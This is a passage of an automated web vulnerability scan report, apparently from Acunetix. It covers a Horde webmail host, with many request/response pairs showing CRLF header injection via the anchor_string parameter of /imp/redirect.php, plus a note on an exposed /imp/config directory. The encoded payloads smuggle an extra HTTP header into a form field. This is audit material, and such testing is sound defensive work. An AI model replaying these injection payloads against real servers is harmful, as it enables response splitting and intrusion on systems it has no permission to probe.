Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=sjtjgfnc&load_frameset=1&loginButton=Login&new_lang=ar_OM&pass=acUn3t1x&server=pop&server_key=pop&url=
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Acunetix Website Audit15
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=sjtjgfnc&server=pop&horde_logout_token=erClDmqfBbtYxJKZsU07BQLWN-Q&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:39:34 GMT
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=ymdqagel&load_frameset=1&loginButton=Login&new_lang=da_DK&pass=acUn3t1x&server=pop&server_key=pop&url=
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=ymdqagel&server=pop&horde_logout_token=ZJEpK9H2Ze2uaBtQUeqRtQM-2Ak&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:39:30 GMT
Content-Length: 485
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Acunetix Website Audit16
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=bsximucj&load_frameset=1&loginButton=Login&new_lang=ar_OM&pass=acU
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=bsximucj&server=pop&horde_logout_token=GadiXsbvwaodw3AzFe7AQtC-kPk&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:39:43 GMT
Content-Length: 485
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 250
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&Horde=cc98ab8bb445fe090d5f7b594f58e208&ie_version=&imapuser=pstxmuoi&load_frameset=1&loginButton=Login&new_lang=ar_OM&pass=acUn3t1x&server=pop&server_key=pop&url=
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=pstxmuoi&server=pop&horde_logout_token=LD9VjI71ABIsj_vDwCCTNjSL-f0&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:43 GMT
Content-Length: 485
Acunetix Website Audit17
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 250
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&Horde=cc98ab8bb445fe090d5f7b594f58e208&ie_version=&imapuser=pstxmuoi&load_frameset=1&loginButton=Login&new_lang=id_ID&pass=acUn3t1x&server=pop&server_key=pop&url=
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=pstxmuoi&server=pop&horde_logout_token=nqqFHUnbKUnFikwhrKnb0nqQ_lU&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:49 GMT
Content-Length: 485
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 250
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&Horde=cc98ab8bb445fe090d5f7b594f58e208&ie_version=&imapuser=pstxmuoi&load_frameset=1&loginButton=Login&new_lang=bs_BA&pass=acUn3t1x&server=pop&server_key=pop&url=
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Acunetix Website Audit18
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=pstxmuoi&server=pop&horde_logout_token=aFerm3yAYpGMfgEnBvEx-O-Scy0&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:50 GMT
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=kknytbhi&load_frameset=1&loginButton=Login&new_lang=ar_OM&pass=acUn3t1x&server=pop&server_key=pop&url=
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=kknytbhi&server=pop&horde_logout_token=1WHli2IB81zaNwwisAylSnUjX_Q&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:39:35 GMT
Content-Length: 485
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 250
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Acunetix Website Audit19
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&Horde=cc98ab8bb445fe090d5f7b594f58e208&ie_version=&imapuser=pstxmuoi&load_frameset=1&lo
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=pstxmuoi&server=pop&horde_logout_token=SdYSjNlKeYS68QWaYLMXNXYfPHQ&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:46 GMT
Content-Length: 485
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=ymdqagel&load_frameset=1&loginButton=Login&new_lang=bs_BA&pass=acUn3t1x&server=pop&server_key=pop&url=
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=ymdqagel&server=pop&horde_logout_token=05GzsAx9-5mXhwiJBszLaf93Rlg&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:39:21 GMT
Content-Length: 485
Acunetix Website Audit20
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=lyoxhoba&load_frameset=1&loginButton=Login&new_lang=ar_OM&pass=acUn3t1x&server=pop&server_key=pop&url=
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=lyoxhoba&server=pop&horde_logout_token=n4Vtm9aXdD5x27VmdCUdJq84ad0&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:39:40 GMT
Content-Length: 485
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=tjmxnsfk&load_frameset=1&loginButton=Login&new_lang=ar_OM&pass=acUn3t1x&server=pop&server_key=pop&url=
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Acunetix Website Audit21
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=tjmxnsfk&server=pop&horde_logout_token=t8tuwVUb1Y1HjaxQOP5Vu5FMfdE&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:39:38 GMT
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=ymdqagel&load_frameset=1&loginButton=Login&new_lang=id_ID&pass=acUn3t1x&server=pop&server_key=pop&url=
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=ymdqagel&server=pop&horde_logout_token=3GHeLpquhgOw2FTJwtbl9HO1PF8&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:39:19 GMT
Content-Length: 485
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Acunetix Website Audit22
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=ymdqagel&load_frameset=1&loginButton=Login&new_lang=bg_BG&pass=acU
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=ymdqagel&server=pop&horde_logout_token=vaAj0u6O49xJGmk9F4tgkR653Is&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:39:22 GMT
Content-Length: 485
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=ymdqagel&load_frameset=1&loginButton=Login&new_lang=zh_CN&pass=acUn3t1x&server=pop&server_key=pop&url=
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=ymdqagel&server=pop&horde_logout_token=cH2tRGN-iEYsfI5daccq3hs9Sy0&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:39:27 GMT
Content-Length: 485
Acunetix Website Audit23
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=ymdqagel&load_frameset=1&loginButton=Login&new_lang=zh_TW&pass=acUn3t1x&server=pop&server_key=pop&url=
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=ymdqagel&server=pop&horde_logout_token=oQlWVBjkvBGzbXadd_d5IjB6vBw&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:39:28 GMT
Content-Length: 485
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=ymdqagel&load_frameset=1&loginButton=Login&new_lang=ca_ES&pass=acUn3t1x&server=pop&server_key=pop&url=
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Acunetix Website Audit24
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=ymdqagel&server=pop&horde_logout_token=jru78BtS52tgFi0k3izOYSvCoHM&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:39:24 GMT
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=ymdqagel&load_frameset=1&loginButton=Login&new_lang=cs_CZ&pass=acUn3t1x&server=pop&server_key=pop&url=
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=ymdqagel&server=pop&horde_logout_token=UhVzw_mUTmPG8IchsiWhBSiwxac&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:39:25 GMT
Content-Length: 485
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Acunetix Website Audit25
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=ymdqagel&load_frameset=1&loginButton=Login&new_lang=ar_OM&pass=acU
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=ymdqagel&server=pop&horde_logout_token=T3AWWrhLK2yZWXJXotmXI5tdZ2A&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:39:16 GMT
Content-Length: 485
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=ymdqagel&load_frameset=1&loginButton=Login&new_lang=ar_SY&pass=acUn3t1x&server=pop&server_key=pop&url=
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=ymdqagel&server=pop&horde_logout_token=qHkbYc0eVRGgl8wE4VkEMRJIxQc&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:39:18 GMT
Content-Length: 485
Acunetix Website Audit26
Possible sensitive directories
 
SeverityLow
TypeValidation
Reported by moduleScripting (Possible_Sensitive_Directories.script)
Description
A possible sensitive directory has been found. This directory is not directly linked from the website.This check looks for common sensitive resources like backup directories, database dumps, administration pages, temporary directories. Each one of these directories could help an attacker to learn more about his target.
Impact
This directory may expose sensitive information that could help a malicious user to prepare more advanced attacks.
Recommendation
Restrict access to this directory or remove it from the website.
Affected items
/imp/config
Details
No details are available.
Request
GET /imp/config HTTP/1.1
Accept: acunetix/wvs
Range: bytes=0-99999
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
